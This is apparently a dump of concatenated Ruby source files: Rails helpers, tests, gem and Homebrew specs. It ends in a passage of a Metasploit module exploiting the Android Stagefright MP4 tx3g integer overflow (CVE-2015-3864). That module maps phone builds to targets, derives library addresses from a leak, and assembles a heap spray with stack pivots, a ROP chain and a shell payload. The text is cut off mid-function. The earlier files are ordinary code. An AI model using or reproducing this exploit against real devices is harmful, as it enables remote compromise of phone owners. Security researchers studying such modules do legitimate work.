if !(full_name.strip.empty?) && (full_name.strip.gsub(' ', '_').casecmp(post.user.username) != 0) && (full_name.strip.gsub(' ', '').casecmp(post.user.username) != 0)
display_name = "#{full_name} @#{post.user.username}"
end
message = I18n.t('chat_integration.provider.zulip.message', user: display_name,
post_url: post.full_url,
title: post.topic.title,
excerpt: post.excerpt(SiteSetting.chat_integration_zulip_excerpt_length, text_entities: true, strip_links: true, remap_emoji: true))
data = {
type: 'stream',
to: stream,
subject: subject,
content: message
}
end
def self.trigger_notification(post, channel, rule)
stream = channel.data['stream']
subject = channel.data['subject']
message = self.generate_zulip_message(post, stream, subject)
response = send_message(message)
if !response.kind_of?(Net::HTTPSuccess)
error_key = nil
error_key = 'chat_integration.provider.zulip.errors.does_not_exist' if response.body.include?('does not exist')
raise ::DiscourseChat::ProviderError.new info: { error_key: error_key, message: message, response_code: response.code, response_body: response.body }
end
end
end
end
end
| 36.942029 | 200 | 0.58572 |
b92e18e394aa2b8164adca59f1aaa55a90f0906a | 1,148 | # frozen_string_literal: true
# desc "Explaining what the task does"
# task :covid_research do
# # Task goes here
# end
desc 'Rebuild encrypted-form.json when valid-intake-submission.json changes'
task rebuild_encrypted_fixture: :environment do
fixture_dir = CovidResearch::Engine.root.join('spec', 'fixtures', 'files')
submission = JSON.parse(File.read(File.join(fixture_dir, 'valid-intake-submission.json')))
formatter = CovidResearch::RedisFormat.new
formatter.form_data = JSON.generate(submission)
File.open(File.join(fixture_dir, 'encrypted-form.json'), 'w') do |f|
f.puts formatter.to_json
end
end
desc 'Rebuild encrypted-update-form.json when valid-update-submission.json changes'
task rebuild_encrypted_update_fixture: :environment do
fixture_dir = CovidResearch::Engine.root.join('spec', 'fixtures', 'files')
submission = JSON.parse(File.read(File.join(fixture_dir, 'valid-update-submission.json')))
formatter = CovidResearch::RedisFormat.new
formatter.form_data = JSON.generate(submission)
File.open(File.join(fixture_dir, 'encrypted-update-form.json'), 'w') do |f|
f.puts formatter.to_json
end
end
| 37.032258 | 92 | 0.761324 |
f89014b314842c7d28afa5323a8978045477f42a | 1,011 | # wkhtml2pdf Ruby interface
# http://code.google.com/p/wkhtmltopdf/
require 'logger'
require 'digest/md5'
require 'open3'
class WickedPdf
def initialize(wkhtmltopdf_binary_path = nil)
@exe_path = wkhtmltopdf_binary_path
@exe_path ||= WICKED_PDF[:exe_path] unless WICKED_PDF.empty?
@exe_path ||= `which wkhtmltopdf`.chomp
raise "Location of wkhtmltopdf unknown" if @exe_path.empty?
raise "Bad wkhtmltopdf's path" unless File.exists?(@exe_path)
raise "Wkhtmltopdf is not executable" unless File.executable?(@exe_path)
end
def pdf_from_string(string, options=nil)
command_for_stdin_stdout = "#{@exe_path} #{options} - - -q" # -q for no errors on stdout
p "*"*15 + command_for_stdin_stdout + "*"*15 if RAILS_ENV == 'development'
Open3.popen3(command_for_stdin_stdout) do |stdin, stdout, stderr|
stdin.write(string)
stdin.close
pdf = stdout.read
raise "PDF could not be generated!\n#{stderr.read}" if pdf.length == 0
pdf
end
end
end
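# A minimal usage sketch (assumes a wkhtmltopdf binary is on the PATH; the
# file name below is illustrative):
#
#   pdf = WickedPdf.new.pdf_from_string("<h1>Hello</h1>")
#   File.open("hello.pdf", "wb") { |f| f.write(pdf) }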
| 33.7 | 92 | 0.703264 |
bf7272556244eb750d9025685faa11ac89defa8d | 1,606 | class Pygobject3 < Formula
desc "GNOME Python bindings (based on GObject Introspection)"
homepage "https://wiki.gnome.org/Projects/PyGObject"
url "https://download.gnome.org/sources/pygobject/3.34/pygobject-3.34.0.tar.xz"
sha256 "87e2c9aa785f352ef111dcc5f63df9b85cf6e05e52ff04f803ffbebdacf5271a"
bottle do
rebuild 1
sha256 "19438d4f683d7c240842f9ae4793ac7628b2e412e1fc9ece7f11bb7ae6cfa2a1" => :catalina
sha256 "bc8b4c3b891a179d532e2ef4352d6c6f767472d37f2d800ce2042c83b11c482f" => :mojave
sha256 "7c7b94ec1114c60af7d943b3d5230b1986515a6eeb057905940711084b43d14b" => :high_sierra
sha256 "cf9af919bcdb3b194a8f643c15b09aecc49be75fffdc8fa594b2ca7dfb78acc9" => :x86_64_linux
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "gobject-introspection"
depends_on "py3cairo"
depends_on "python"
def install
mkdir "buildpy3" do
system "meson", "--prefix=#{prefix}",
"-Dpycairo=true",
"-Dpython=python3",
".."
system "ninja", "-v"
system "ninja", "install", "-v"
end
end
test do
Pathname("test.py").write <<~EOS
import gi
gi.require_version("GLib", "2.0")
assert("__init__" in gi.__file__)
from gi.repository import GLib
assert(31 == GLib.Date.get_days_in_month(GLib.DateMonth.JANUARY, 2000))
EOS
pyversion = Language::Python.major_minor_version "python3"
ENV.prepend_path "PYTHONPATH", lib/"python#{pyversion}/site-packages"
system "python3", "test.py"
end
end
| 34.170213 | 94 | 0.697385 |
382afc775e89f2079384410adf7405fbd2289b4e | 1,004 | # encoding: utf-8
module SamlIdp
class IdpController < ActionController::Base
include SamlIdp::Controller
protect_from_forgery
if Rails.version.to_i < 4
before_filter :validate_saml_request
else
before_action :validate_saml_request
end
def new
render :template => "saml_idp/idp/new"
end
def create
unless params[:email].blank? && params[:password].blank?
person = idp_authenticate(params[:email], params[:password])
if person.nil?
@saml_idp_fail_msg = "Incorrect email or password."
else
@saml_response = idp_make_saml_response(person)
render :template => "saml_idp/idp/saml_post", :layout => false
return
end
end
render :template => "saml_idp/idp/new"
end
protected
def idp_authenticate(email, password)
raise "Not implemented"
end
def idp_make_saml_response(person)
raise "Not implemented"
end
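    # A minimal sketch of the overrides a host application would supply.
    # Person and its #authenticate method are assumptions for illustration,
    # not part of this engine:
    #
    #   def idp_authenticate(email, password)
    #     person = Person.find_by(email: email)
    #     person if person && person.authenticate(password)
    #   end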
end
end
| 22.818182 | 72 | 0.639442 |
1c758ff7a971dcd2e63ea7b0231dee3721661bdd | 2,678 | require "spec_helper"
describe "AdminOperations" do
let(:admin) { rdkafka_config.producer }
describe "#create_topic and #delete_topic" do
context "when topic does not exist" do
before do
# Remove admin_new_topic if it already exists first
begin
admin.delete_topic("admin_new_topic")
# Wait a little to allow Kafka to catch up
sleep 1
rescue Rdkafka::RdkafkaError
# Ignore error while deleting
end
end
it "should succeed" do
admin.create_topic("admin_new_topic", config: {"retention.ms": "12345"})
# Wait a little to allow Kafka to catch up
sleep 1
expect(admin.describe_topic("admin_new_topic")["retention.ms"]).to eq("12345")
admin.alter_topic("admin_new_topic", {"retention.ms": "56789"})
expect(admin.describe_topic("admin_new_topic")["retention.ms"]).to eq("56789")
expect do
admin.create_partitions_for("admin_new_topic", num_partitions: 1)
end.to raise_error(Rdkafka::RdkafkaError, /invalid_partitions/)
metadata = admin.metadata_for("admin_new_topic")
expect(metadata.partitions.count).to eq(1)
admin.create_partitions_for("admin_new_topic", num_partitions: 8)
metadata = admin.metadata_for("admin_new_topic")
expect(metadata.partitions.count).to eq(8)
admin.delete_topic("admin_new_topic")
end
end
context "when topic exists" do
it "should raise an error" do
expect do
admin.create_topic("empty_test_topic")
end.to raise_error(Rdkafka::RdkafkaError, "Topic 'empty_test_topic' already exists. - Broker: Topic already exists (topic_already_exists)")
end
end
end
describe "#describe_topic" do
context "when topic does not exist" do
it "should raise an error" do
expect do
admin.describe_topic("i_dont_exist")
end.to raise_error(Rdkafka::RdkafkaError, "Broker: Unknown topic or partition - Broker: Unknown topic or partition (unknown_topic_or_part)")
end
end
context "when topic exists" do
it "should succeed" do
config = admin.describe_topic("empty_test_topic")
expect(config.keys).not_to be_empty
expect(config["min.insync.replicas"]).to eq("1")
end
end
context "when kafka brokers do not exist" do
it "should time out" do
admin = Rdkafka::Config.new("bootstrap.servers": "i_dont_exist:9099").producer
expect do
admin.describe_topic("i_dont_exist", timeout: 2)
end.to raise_error(Rdkafka::RdkafkaError, /timed_out/)
end
end
end
end
| 33.061728 | 148 | 0.660194 |
183d3275367252ac3af5d5f16c4fa4a7fcb59779 | 2,569 | module Entrepot
#
# This module should not exist, in essence.
  # As of the moment of writing (April 2012), Virtus does not support circular
  # dependencies between models, nor does it support lazily defining a dependency
  # via a string or symbol. So either you pre-define a class (you remember good
  # old C days, right?) or I open up a class and give you a warning which you
  # shouldn't be scared of.
#
module Model
module ClassMethods
def const_missing(name)
puts "Warning: #{name} was not defined, assuming further definition. Keep calm tho."
const_set(name, Class.new)
end
end
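    # A quick sketch of the effect (Author and Post are hypothetical): a class
    # extended with these methods turns a reference to a not-yet-defined
    # constant into an empty stub class instead of a NameError, so mutually
    # dependent models can load in either order:
    #
    #   class Author
    #     extend Entrepot::Model::ClassMethods
    #     Post # prints the warning and defines Author::Post as Class.new
    #   end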
def persisted?
@persisted || false
end
def mark_as_persisted
@persisted = true
end
# Ported from Virtus fork
#
# Returns a hash of all publicly accessible attributes by
# recursively calling #to_hash on the objects that respond to it.
#
# @example
# class Person
# include Virtus
#
# attribute :name, String
# attribute :age, Integer
# attribute :email, String, :accessor => :private
#
# attribute :friend, Person
# end
#
    # john = Person.new({ :name => 'John', :age => 28 })
    # jack = Person.new({ :name => 'Jack', :age => 31, :friend => john })
    #
    # jack.to_hash # => { :name => 'Jack', :age => 31, :friend => { :name => 'John', :age => 28 } }
#
# @return [Hash]
#
# @api public
def to_hash
hash = attributes.dup
hash.each do |key, value|
case
when value.is_a?(Array)
hash[key] = value.collect do |item_within_value|
safely_recurse_into(item_within_value) { |i| i.respond_to?(:to_hash) ? i.to_hash : i }
end
when value.respond_to?(:to_hash)
hash[key] = safely_recurse_into(value) do |v| v.to_hash end
when value.nil?
hash.delete(key)
end
end
hash
end
protected
# Safely recurses into the value, avoiding StackOverflow errors.
#
# Accepts any value parameter, and a block, which will receive this value parameter.
#
# @return [Object]
#
# @api private
def safely_recurse_into(value)
Thread.current[caller.first] ||= []
caller_stack = Thread.current[caller.first]
return_value = nil
if !caller_stack.include?(value.object_id)
        caller_stack.push(value.object_id)
return_value = yield(value)
caller_stack.pop
end
return_value
end
end
end
| 27.623656 | 102 | 0.60218 |
28fa98fdce75c0285afe2ef0c19873c9cd5ad67a | 1,094 | Pod::Spec.new do |s|
# pod lib lint --allow-warnings --verbose --skip-import-validation
s.name = "MXLogger"
s.version = "0.1.3.1"
  s.summary      = "MXLogger cross-platform client log collection"
  s.description  = <<-DESC
                   MXLogger cross-platform client log collection
                   DESC
s.homepage = "https://github.com/coder-dongjiayi/MXLogger"
s.license = { :type => "BSD 3-Clause", :file => "LICENSE.TXT"}
s.author = { "dongjiayi" => "[email protected]" }
s.ios.deployment_target = "9.0"
s.source = { :git => "https://github.com/coder-dongjiayi/MXLogger.git", :tag => "v#{s.version}" }
s.source_files = "iOS/MXLogger/MXLogger", "iOS/MXLogger/MXLogger/*.{h,mm}"
s.public_header_files = "iOS/MXLogger/MXLogger/MXLogger.h"
s.framework = "CoreFoundation"
s.dependency 'MXLoggerCore', "0.1.3.1"
s.libraries = "z", "c++"
s.pod_target_xcconfig = {
'VALID_ARCHS' => 'x86_64 armv7 arm64',
"CLANG_CXX_LANGUAGE_STANDARD" => "gnu++17",
"CLANG_CXX_LIBRARY" => "libc++",
"CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF" => "NO",
}
end
| 29.567568 | 105 | 0.597806 |
ff142976d8cb3e9eff217b8ab9b858d4df228f5b | 1,169 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'liquid/c/version'
Gem::Specification.new do |spec|
spec.name = "liquid-c"
spec.version = Liquid::C::VERSION
spec.authors = ["Justin Li", "Dylan Thacker-Smith"]
spec.email = ["[email protected]"]
spec.summary = "Liquid performance extension in C"
spec.homepage = "https://github.com/shopify/liquid-c"
spec.license = "MIT"
spec.extensions = ['ext/liquid_c/extconf.rb']
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'liquid', '>= 3.0.0'
spec.add_development_dependency 'bundler', ">= 1.5" # has bugfix for segfaulting deploys
spec.add_development_dependency "rake"
spec.add_development_dependency 'rake-compiler'
spec.add_development_dependency 'minitest'
spec.add_development_dependency 'stackprof' if Gem::Version.new(RUBY_VERSION) >= Gem::Version.new("2.1.0")
end
| 40.310345 | 108 | 0.67408 |
ffcac86a3efe97b2f3e96c4d5b8e212b619f0a6f | 3,718 | # encoding: UTF-8
#
# Author:: Xabier de Zuazo (<[email protected]>)
# Copyright:: Copyright (c) 2014 Onddo Labs, SL.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'net/smtp'
require_relative 'mail_helpers'
describe 'Postfix' do
describe command('/usr/sbin/postconf') do
its(:exit_status) { should eq 0 }
its(:stderr) { should eq '' }
end
describe process('master') do
it { should be_running }
end
# smtp
describe port(25) do
it { should be_listening.with('tcp') }
end
# ssmtp
describe port(465) do
it { should be_listening.with('tcp') }
end
# submission
describe port(587) do
it { should be_listening.with('tcp') }
end
it 'connects to smtp SSL' do
expect(
command('echo | openssl s_client -connect 127.0.0.1:465')
.exit_status
).to eq 0
end
it 'connects to smtp with starttls' do
expect(
command('echo | openssl s_client -starttls smtp -connect 127.0.0.1:smtp')
.exit_status
).to eq 0
end
it 'is able to login using submission (plain)' do
smtp = Net::SMTP.new 'localhost', 587
ctx = OpenSSL::SSL::SSLContext.new
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
smtp.enable_starttls(ctx)
smtp.start(
'onddo.com', '[email protected]', 'p0stm@st3r1', :plain
) { |_smtp| puts 'OK' }
end
describe 'when an email is sent through smtp' do
fingerprint = "G27XB6yIyYyM99Tv8UXW#{Time.new.to_i}"
let(:maildir) { '/var/vmail/foobar.com/postmaster' }
before(:context) { send_email(fingerprint) }
it 'is able to receive it', retry: 30, retry_wait: 1 do
expect(all_file_contents("#{maildir}/new/*")).to include fingerprint
end
end
family = os[:family].downcase
key_dir, cert_dir =
if %w(debian ubuntu).include?(family)
%w(/etc/ssl/private /etc/ssl/certs)
elsif %w(redhat centos fedora scientific amazon).include?(family)
%w(/etc/pki/tls/private /etc/pki/tls/certs)
else
%w(/etc /etc)
end
describe file("#{cert_dir}/postfix.pem") do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file("#{key_dir}/postfix.key") do
it { should be_file }
it { should be_mode 600 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file('/etc/mailname') do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
describe file('/var/spool/postfix/etc') do
it { should be_directory }
it { should be_mode 755 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
%w(
etc/resolv.conf
etc/localtime
etc/services
etc/hosts
etc/nsswitch.conf
etc/nss_mdns.config
).each do |chroot_file|
describe file("/var/spool/postfix/#{chroot_file}"),
if: ::File.exist?("/#{chroot_file}") do
it { should be_file }
it { should be_mode 644 }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
end
end
end
| 26.942029 | 79 | 0.656805 |
9145b57847947aa6c8151368a89270d64d4c74eb | 222 | require 'fog/core/collection'
require 'fog/libvirt/models/compute/nic'
module Fog
module Libvirt
class Compute
class Nics < Fog::Collection
model Fog::Libvirt::Compute::Nic
end
end
end
end
| 17.076923 | 40 | 0.675676 |
28172c5d868c2a8d16abe6727349902a38a0ac5d | 107 | # frozen_string_literal: true
module SolidusAdmin
class DashboardsController < BaseController
end
end
| 15.285714 | 45 | 0.82243 |
7a2b69561efd9083702969feb7f64ec8db094cc9 | 40,306 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Android Stagefright MP4 tx3g Integer Overflow",
'Description' => %q{
This module exploits an integer overflow vulnerability in the Stagefright
Library (libstagefright.so). The vulnerability occurs when parsing specially
crafted MP4 files. While a wide variety of remote attack vectors exist, this
particular exploit is designed to work within an HTML5 compliant browser.
Exploitation is done by supplying a specially crafted MP4 file with two
tx3g atoms that, when their sizes are summed, cause an integer overflow when
processing the second atom. As a result, a temporary buffer is allocated
with insufficient size and a memcpy call leads to a heap overflow.
This version of the exploit uses a two-stage information leak based on
corrupting the MetaData that the browser reads from mediaserver. This method
is based on a technique published in NorthBit's Metaphor paper. First,
we use a variant of their technique to read the address of a heap buffer
located adjacent to a SampleIterator object as the video HTML element's
videoHeight. Next, we read the vtable pointer from an empty Vector within
the SampleIterator object using the video element's duration. This gives
us a code address that we can use to determine the base address of
libstagefright and construct a ROP chain dynamically.
NOTE: the mediaserver process on many Android devices (Nexus, for example) is
constrained by SELinux and thus cannot use the execve system call. To avoid
this problem, the original exploit uses a kernel exploit payload that disables
SELinux and spawns a shell as root. Work is underway to make the framework
more amenable to these types of situations. Until that work is complete, this
exploit will only yield a shell on devices without SELinux or with SELinux in
permissive mode.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Exodus/jordan # initial discovery / disclosure
'jduck', # Metasploit module, further infoleak development
'NorthBit' # intiial information leak implementation
],
'References' =>
[
[ 'AKA', 'stagefright' ],
[ 'CVE', '2015-3864' ],
[ 'URL', 'https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/' ],
[ 'URL', 'http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ],
[ 'URL', 'https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf' ],
[ 'URL', 'https://github.com/NorthBit/Metaphor' ],
# Not used, but related
[ 'URL', 'http://drops.wooyun.org/papers/7558' ],
[ 'URL', 'http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ],
[ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ],
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
},
#'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' },
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X64, ARCH_MIPSLE],
'Targets' =>
[
[ 'Automatic', {} ],
#
# Each target includes information about the device, firmware, and
# how exactly to about exploiting it.
#
# Primarily, these targets are used to map a browser's User-Agent to
# exploit specifics for that device / build.
#
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX21P',
'Release' => '5.0',
'Rop' => 'lrx',
'SprayAddress' => 0xb1508000
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY48G',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)',
{
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)',
{
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.0 (LRX21O)',
{
'Model' => 'Nexus 5',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
}
],
[
'Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 5',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1 (LMY47D)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1 (LMY47I)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY48B',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 5',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 6 (shamu) with Android 5.0 (LRX21O)',
{
'Model' => 'Nexus 6',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
}
],
[
'Nexus 6 (shamu) with Android 5.0.1 (LRX22C)',
{
'Model' => 'Nexus 6',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47D)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47E)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47E',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47I)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)',
{
'Model' => 'Nexus 6',
'Build' => 'LYZ28E',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28E'
}
],
[
'Nexus 6 (shamu) with Android 5.1 (LMY47M)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47M',
'Release' => '5.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY47Z',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LVY48C)',
{
'Model' => 'Nexus 6',
'Build' => 'LVY48C',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LMY48I)',
{
'Model' => 'Nexus 6',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)',
{
'Model' => 'Nexus 6',
'Build' => 'LYZ28J',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28J'
}
],
[
'Nexus 6 (shamu) with Android 5.1.1 (LVY48E)',
{
'Model' => 'Nexus 6',
'Build' => 'LVY48E',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
}
],
[
'Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)',
{
'Model' => 'SM-G900V',
'Build' => 'LRX21T',
'Release' => '5.0',
'Rop' => 'sm-g900v / OE1',
'SprayAddress' => 0xaf008000,
'SampleIteratorSize' => 0xa8,
'VectorSize' => 0xec
}
]
],
'Privileged' => true,
'DisclosureDate' => "Aug 13 2015",
'DefaultTarget' => 0))
=begin
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
=end
end
def exploit
@peers = {}
super
end
def get_target(request)
agent = request.headers['User-Agent']
self.targets.each do |t|
next if t.name == 'Automatic'
regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}")
return t if (agent =~ /#{regexp}/)
end
return nil
end
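  # For example (illustrative UA string), a request bearing
  # "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 6 Build/LYZ28E) ..." matches the
  # 'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)' target above.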
#
# Construct a page worth of data that we'll spray
#
# NOTE: The data within is target-specific
#
def build_spray(my_target, peer, spray_addr)
# Initialize the page to a reasonable state.
page = ''
page = rand_text(4096)
# Load target-based exploit-specific variables
details = get_details(my_target)
return nil if details.nil?
# Calculate the libstagefright.so base address
vector_rva = details['VectorRVA']
vector_ptr = peer[:vector_vtable_addr]
libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000)
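    # e.g. (hypothetical values): a leaked vtable pointer of 0xb66a1234 with a
    # VectorRVA of 0x00105234 gives 0xb66a1000 - 0x105000 = 0xb659c000.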
# If we smash mDataSource, this ends up controlling the program counter!!
=begin
0xb65fd7c4 <parseChunk(long long*, int)+4596>: ldr r2, [r0, #0]
0xb65fd7c6 <parseChunk(long long*, int)+4598>: str r1, [sp, #0]
0xb65fd7c8 <parseChunk(long long*, int)+4600>: ldr r5, [r7, #0]
0xb65fd7ca <parseChunk(long long*, int)+4602>: str r5, [sp, #4]
0xb65fd7cc <parseChunk(long long*, int)+4604>: ldr r6, [r2, #28]
0xb65fd7ce <parseChunk(long long*, int)+4606>: ldrd r2, r3, [r10]
0xb65fd7d2 <parseChunk(long long*, int)+4610>: blx r6
0xb65fd7d4 <parseChunk(long long*, int)+4612>: ldrd r2, r3, [sp, #64] ; 0x40
=end
# Initialize our pivot values and adjust them to libstagefright's base.
# First, load r0 (pointer to our buffer) into some register..
mds_pivot1 = libsf_base + details['Pivot1']
# Next, load sp (and probably other stuff) from there
mds_pivot2 = libsf_base + details['Pivot2']
# Finally, skip over some stuff and kick of the ROP chain
mds_adjust = libsf_base + details['Adjust']
# The offset to the ROP change beginning
rop_start_off = 0x30
# Point sp to the remainder of the ROP chain
new_sp = spray_addr + rop_start_off
# Sometimes the spray isn't aligned perfectly, this fixes that situation...
unalign_off = 0x998
new_sp2 = new_sp + 0x1000 - unalign_off
# This pointer should point to the beginning of the shellcode payload
payload_ptr = spray_addr + 0xa0
# Put the stack back!
stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp
# Depending on the pivot strategy in use, we have to set things up slightly
# differently...
#
# In each case, we use a two-stage pivot that reads the spray address from
# r0 (we smashed that, remember).
#
# The addroffs array is used to map values to the offsets where the pivots
# expect them to be.
#
case details['PivotStrategy']
when 'lrx'
addroffs = [
[ 0x0, new_sp ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
]
# Since we are only popping one item in pivot2, we reduce the rop_start_off
rop_start_off -= 4
# Adjust the payload pointer
payload_ptr -= 4
when 'lmy-1'
addroffs = [
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
]
when 'lmy-2'
ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
]
stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp
when 'lyz'
ptr_to_mds_pivot2 = spray_addr + 0x8
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
[ 0x24, new_sp ],
# lr is at 0x28!
[ 0x2c, mds_adjust ]
]
      # We can't fix it because we don't know where the original stack is anymore :-/
stack_fix = ""
when 'sm-g900v'
addroffs = [
[ 0x4, mds_adjust ],
[ 0x10, new_sp ],
[ 0x1c, mds_pivot1 ],
[ 0x20, mds_pivot2 ]
]
else
print_error("ERROR: PivotStrategy #{details['PivotStrategy']} is not implemented yet!")
return nil
end
# We need our ROP to build the page... Create it.
rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] })
# Fix up the payload pointer in the ROP
idx = rop.index([ 0xc600613c ].pack('V'))
rop[idx, 4] = [ payload_ptr ].pack('V')
# Insert the ROP
page[rop_start_off, rop.length] = rop
# Insert the special values...
addroffs.each do |ao|
off,addr = ao
page[off,4] = [ addr ].pack('V')
# Sometimes the spray isn't aligned perfectly...
if addr == new_sp
